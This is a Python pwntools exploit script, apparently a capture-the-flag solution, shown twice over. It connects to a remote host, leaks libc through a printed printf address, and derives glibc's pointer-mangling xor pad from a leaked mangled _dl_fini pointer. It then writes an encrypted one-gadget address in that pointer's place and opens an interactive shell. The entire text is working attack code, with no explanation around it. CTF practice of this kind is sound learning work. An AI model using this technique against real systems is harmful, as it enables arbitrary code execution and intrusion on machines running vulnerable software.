romanking98/exploit_left.py

## exploit_left.py
#!/usr/bin/python
from pwn import *

rol1 = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

ror1 = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

elf = ELF("./libc-2.23.so.1")
p = remote("159.203.116.12", 7777)
#p = process("./left",env={"LD_PRELOAD":"./libc-2.23.so.1"})
raw_input()

p.recvuntil("printf(): ")
libc = p.recvline().strip("\n")

libc = int(libc) - elf.symbols['printf']
#dl_fini = libc + 0x3d9ca0
dl_fini = libc + 0x3daab0
canary = libc + 0x3c5c58

log.info("Libc: " + hex(libc))
log.info("_dl_fini: " + hex(dl_fini))
log.info("canary: " + hex(canary))

p.sendline(str(canary))

p.recvuntil("content: ")

leak = p.recvline().strip("\n")
leak = int(leak)
log.info("leak: " + hex(leak))

p.recvuntil("write address:")
p.sendline(str(canary))

p.recvuntil("new value:")

# Deduce xor pad.
# Then encrpypt with xor pad magic gadget address
# Write that
# sendline(fixed)

var1 = dl_fini

new_leak = ror1(leak,0x0000000000000011,64)

print hex(new_leak)

var2 = new_leak

#var1 = var2 ^ xorpad

xorpad = var2 ^ var1

#magic = 0x45216 + libc
#magic = libc + 0xf1117
#magic = libc + 0xf0274
magic = libc + 0x4526a
#magic = 0x4006bd

log.info("Magic: " + hex(magic))

enc = magic ^ xorpad

enc = rol1(enc,0x11,64)

p.sendline(str(enc))

p.interactive()
	#!/usr/bin/python
	from pwn import *

	rol1 = lambda val, r_bits, max_bits: \
	(val << r_bits%max_bits) & (2**max_bits-1) \| \
	((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

	ror1 = lambda val, r_bits, max_bits: \
	((val & (2**max_bits-1)) >> r_bits%max_bits) \| \
	(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

	elf = ELF("./libc-2.23.so.1")
	p = remote("159.203.116.12", 7777)
	#p = process("./left",env={"LD_PRELOAD":"./libc-2.23.so.1"})
	raw_input()

	p.recvuntil("printf(): ")
	libc = p.recvline().strip("\n")

	libc = int(libc) - elf.symbols['printf']
	#dl_fini = libc + 0x3d9ca0
	dl_fini = libc + 0x3daab0
	canary = libc + 0x3c5c58

	log.info("Libc: " + hex(libc))
	log.info("_dl_fini: " + hex(dl_fini))
	log.info("canary: " + hex(canary))

	p.sendline(str(canary))

	p.recvuntil("content: ")

	leak = p.recvline().strip("\n")
	leak = int(leak)
	log.info("leak: " + hex(leak))

	p.recvuntil("write address:")
	p.sendline(str(canary))

	p.recvuntil("new value:")

	# Deduce xor pad.
	# Then encrpypt with xor pad magic gadget address
	# Write that
	# sendline(fixed)

	var1 = dl_fini

	new_leak = ror1(leak,0x0000000000000011,64)

	print hex(new_leak)

	var2 = new_leak

	#var1 = var2 ^ xorpad

	xorpad = var2 ^ var1

	#magic = 0x45216 + libc
	#magic = libc + 0xf1117
	#magic = libc + 0xf0274
	magic = libc + 0x4526a
	#magic = 0x4006bd

	log.info("Magic: " + hex(magic))

	enc = magic ^ xorpad

	enc = rol1(enc,0x11,64)

	p.sendline(str(enc))

	p.interactive()